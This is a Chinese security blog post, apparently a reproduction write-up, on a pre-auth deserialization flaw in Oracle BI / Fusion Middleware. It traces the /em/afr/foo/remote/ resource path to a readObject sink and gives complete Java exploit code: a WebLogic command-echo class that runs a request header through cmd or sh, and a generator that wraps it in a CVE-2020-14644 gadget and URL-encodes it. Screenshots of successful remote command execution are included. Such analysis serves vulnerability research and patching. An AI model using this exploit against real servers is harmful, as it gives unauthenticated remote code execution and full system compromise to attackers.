警告
本文最后更新于 2022-06-29,文中内容可能已过时。
安装Oracle19c,安装的时候这里要选AL32UTF8
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/fa71075d-a611-831b-3c81-74f4fc35b44a.png)
接下来会卡在42%,多等一会就好了。
安装fmw_12.2.1.3.0_infrastructure.jar 下一步下一步就行
然后安装bi fmw_12.2.1.4.0_bi_windows64_Disk1 下一步下一步就行了
然后运行rcu.bat
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f4be72f5-1b75-3b3e-0271-7907bd3ad523.png)
创建完bi所用的数据库之后运行C:\Oracle\Middleware\Oracle_Home\bi\bin\config.cmd配置bi
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/16700886-c082-da03-aa90-e1d2347b3343.png)
然后就安装完成了。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/528b03dc-3f46-d9e1-a79d-f405bbea2aed.png)
修改C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\bin\setDomainEnv.cmd 338行
然后重启Oracle BI的服务,会在8453端口监听debug
在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\bi\servers\AdminServer\tmp_WL_user\em\fw8wi5\war\WEB-INF\web.xml中 em对应Oracle BI的http://172.16.16.132:9500/em/ 管理界面
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/c3e98c75-70e3-d367-ff9d-3119367c4415.png)
web.xml中定义了几个映射关系
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b4463339-c4aa-594f-f430-c7e5102bb1de.png)
在org.apache.myfaces.trinidad.webapp.ResourceServlet#doGet中
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/f9004bc3-523f-4564-06d9-de55b83f535b.png)
根据request获取对应的ResourceLoader和resourcePath
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/4616b493-d0ac-83cb-01a5-f7206da1574c.png)
_getResourceLoader维护了一个ConcurrentMap存放servletPath和loader的映射关系。
在oracle.adfinternal.view.resource.rich.RenderKitResourceLoader中向map中注册了对应关系
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/a3063aaf-935d-fe2b-46e6-4c8e537fe586.png)
当路由为/em/afr/foo/remote/payload时,会由RemoteApplicationResourceLoader
作为doGet中的loader,调用其oracle.adfinternal.view.resource.rich.RemoteApplicationResourceLoader#findResource函数
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/aed591b2-3539-e2ba-49a9-4b19eebc01cc.png)
返回了一个自定义的协议remote和协议处理器RAStreamHandler
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b76fc718-5387-9501-d527-94bbadc69233.png)
RAStreamHandler的openConnection返回一个RAURLConnection实例对象,在其构造函数中
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b6574f04-4bf3-832a-d45e-7e254f73be00.png)
调用_getPathBean
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/216ad479-5dad-520c-9844-34474aa8c5f1.png)
截取到第一个/
然后进入oracle.adfinternal.view.rich.remote.resources.URLEncoderPathBean#getInstanceFromString
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/15a6eaaa-6f14-55ff-3d18-0067d928c907.png)
不断跟进之后就是readObject
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/42d875df-cf78-1eca-23ff-63e5be6fdf33.png)
说明我们可以通过/em/afr/foo/remote/{encode payload}/的形式来反序列化。
gadget可以用CVE-2020-14644,这里放payload。
回显执行命令
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| package com.tangosol.internal.util.invoke.lambda;
import com.tangosol.internal.util.invoke.AbstractRemotable;
public class LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A extends AbstractRemotable {
public LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A() {
try {
weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread) Thread.currentThread()).getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getServletResponse").invoke(obj);
String cmd = req.getHeader("cmd");
if (cmd != null && !cmd.isEmpty()) {
Process exec;
if (System.getProperty("os.name").toLowerCase().contains("win")) {
exec = Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd});
} else {
exec = Runtime.getRuntime().exec(new String[]{"sh", "-c", cmd});
}
res.getServletOutputStream().clearBuffer();
res.getServletOutputStream().writeStream(exec.getInputStream());
res.getServletOutputStream().flush();
res.getServletOutputStream().close();
res.flushBuffer();
}
} catch (Exception var1) {
var1.printStackTrace();
}
}
}
|
生成payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| package com.example.miracle;
import com.tangosol.internal.util.invoke.ClassDefinition;
import com.tangosol.internal.util.invoke.ClassIdentity;
import com.tangosol.internal.util.invoke.RemoteConstructor;
import com.tangosol.internal.util.invoke.lambda.LambdaIdentity;
import oracle.adf.view.rich.util.SerializationUtils;
import java.nio.file.Files;
import java.nio.file.Paths;
public class Main {
public static void main(String[] args) throws Exception {
RemoteConstructor remoteConstructor = new RemoteConstructor(
new ClassDefinition(new ClassIdentity(LambdaIdentity.class), Files.readAllBytes(Paths.get("E:\\tools\\code\\Miracle\\target\\classes\\com\\tangosol\\internal\\util\\invoke\\lambda\\LambdaIdentity$E12ECA49F06D0401A9D406B2DCC7463A.class"))), new Object[]{}
);
String s = SerializationUtils.toURLEncodedString(remoteConstructor);
System.out.println(s);
}
}
|
回显复现截图
http://172.16.16.132:9500/em/afr/foo/remote/
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/6fa86ef0-4bc9-b486-cc6d-49a63d6d319c.png)
http://172.16.16.132:9502/bicomposer/afr/foo/remote/
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/c51525d5-f8bd-ee8d-27bb-deae161e5d85.png)
peterjson和jang在10.3.6上用的是ReflectionExtractor包RemoteInvocation的套娃然后调用ShellSession.eval来rce,记录一下,不做深入了,就是几个cve的综合使用。
打poc时需要注意回显类的类名需要和目标版本对的上才行,具体看kingkk师傅的《CVE-2020-14644分析与gadget的一些思考》
也就是在这个地方com.tangosol.internal.util.invoke.ClassIdentity#ClassIdentity(java.lang.Class<?>)
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/b8fffa5e-7031-375d-364d-38df91da3d33.png)
- https://peterjson.medium.com/miracle-one-vulnerability-to-rule-them-all-c3aed9edeea2
- https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。